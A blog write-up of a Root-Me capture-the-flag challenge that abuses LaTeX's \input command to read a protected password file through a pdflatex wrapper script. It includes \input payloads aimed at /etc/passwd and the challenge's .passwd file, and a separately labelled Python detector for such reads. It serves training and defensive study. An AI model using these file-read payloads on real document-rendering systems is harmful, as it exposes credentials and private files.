deayzl's blog

[RootMe] LaTeX - Input


deayzl 2022. 7. 3. 01:48

I couldn't find a writeup for the LaTeX - Input challenge, so I'm writing one. (It's an easy challenge, worth only 10 points.)

But I won't just give you the full path to the flag. I hope you struggle like I did.

#!/usr/bin/env bash
 
if [[ $# -ne 1 ]]; then
    echo "Usage : ${0} TEX_FILE"
fi
 
if [[ -f "${1}" ]]; then
    TMP=$(mktemp -d)
    cp "${1}" "${TMP}/main.tex"
 
    # Compilation
    echo "[+] Compilation ..."
    timeout 5 /usr/bin/pdflatex \
        -halt-on-error \
        -output-format=pdf \
        -output-directory "${TMP}" \
        -no-shell-escape \
        "${TMP}/main.tex" > /dev/null
 
    timeout 5 /usr/bin/pdflatex \
        -halt-on-error \
        -output-format=pdf \
        -output-directory "${TMP}" \
        -no-shell-escape \
        "${TMP}/main.tex" > /dev/null
 
    chmod u+w "${TMP}/main.tex"
    rm "${TMP}/main.tex"
    chmod 750 -R "${TMP}"
    if [[ -f "${TMP}/main.pdf" ]]; then
        echo "[+] Output file : ${TMP}/main.pdf"
    else
        echo "[!] Compilation error, your logs : ${TMP}/main.log"
    fi
else
    echo "[!] Can't access file ${1}"
fi

Here's the source code. If you pass the name of a .tex file to this shell script, it compiles that file into a PDF using pdflatex. From the resources linked below, you can figure out that LaTeX is a program with its own list of commands.

Hacking with LaTeX | Sebastian Neef - 0day.work

 


-no-shell-escape
Disable the \write18{command} construct, even if it is enabled in the texmf.cnf file.
-shell-restricted
Same as -shell-escape, but limited to a 'safe' set of predefined commands.
-shell-escape
Enable the \write18{command} construct. The command can be any shell command. This construct is normally disallowed for security reasons.

The -no-shell-escape flag is set in that source code, so I can't use \write18{}.

Reading files
All modes allow arbitrary files to be read from the filesystem. The easiest way is to use \input:
\input{/etc/passwd}
This will load the contents of the /etc/passwd file into the PDF file.

This seems like the right way to solve this challenge, because the challenge statement was "Do you know how the input command works?".

Okay, then I think I need to make a .tex file.

Creating a document in LaTeX - Overleaf, Online LaTeX Editor

 


There's a simple example there. Let's create a file in the /tmp/ directory and add \input{} to it.

\documentclass{article}

\begin{document}
\input{/challenge/app-script/ch23/.passwd}
\end{document}

This is the content of the .tex file that I created.
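Seen from the defender's side, the \input read above can be flagged before a submitted file ever reaches pdflatex. The following is an added example, not code from the challenge or from this blog; the /work base directory, the function names and the sample document are assumptions.

```python
import posixpath
import re

# An unescaped '%' starts a TeX comment; '\%' is a literal percent sign.
COMMENT = re.compile(r"(?<!\\)((?:\\\\)*)%.*")
# \input{path} / \include{path}, plus the brace-less primitive form "\input path".
# The lookahead keeps longer control words such as \includegraphics from matching.
READ_CMD = re.compile(r"\\(input|include)(?![A-Za-z@])\s*(?:\{([^}]*)\}|([^\s{}\\]+))")


def classify(path, base):
    """Return why `path` leaves `base`, or None if it stays inside (lexical check only)."""
    if path.startswith("/"):
        return "absolute path"
    resolved = posixpath.normpath(posixpath.join(base, path))
    if not resolved.startswith(base.rstrip("/") + "/"):
        return "escapes working directory"
    return None


def audit_tex(source, base="/work"):
    """List (line_no, command, path, reason) for file reads that point outside `base`."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        code = COMMENT.sub(r"\1", line)  # drop the comment, keep escaped backslashes
        for match in READ_CMD.finditer(code):
            path = (match.group(2) or match.group(3) or "").strip()
            reason = classify(path, base) if path else None
            if reason:
                findings.append((line_no, match.group(1), path, reason))
    return findings


# Constructed sample; line 4 is the \input from the .tex file in this writeup.
SAMPLE = r"""\documentclass{article}
\begin{document}
\input{chapters/intro}
\input{/challenge/app-script/ch23/.passwd}
% \input{/etc/passwd}
50\% done \input ../../etc/hostname
\end{document}
"""

if __name__ == "__main__":
    for finding in audit_tex(SAMPLE):
        print(finding)
```

A pattern filter like this is a triage aid only, since TeX can assemble command names at run time; the enforcing control is the engine's file-access policy (kpathsea's openin_any setting) or an OS-level sandbox.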

./setuid-wrapper /tmp/myfile.tex

You have to run setuid-wrapper so that ch23.sh executes with app-script-ch23-cracked permissions.

This produced a PDF file, which I copied to my computer with scp.

Then I used evince to view the PDF file.

scp -P 2222 app-script-ch23@challenge02.root-me.org:/tmp/tmp.(randomname)/main.pdf ./
evince main.pdf

But my PDF file looked like this:

The flag is commented on the next line :
Did you get it ?

Well... this is where I was stuck for like 3 or 4 hours. :(

This says the flag is commented out. And I found that '%' (the percent character) is the comment character.

So I guessed that I need something like a function that ignores or escapes special characters.

This is the final step to get the flag. Search Google for this and you'll find something.

Add something to the .tex file and run the shell script again. You'll get the flag.
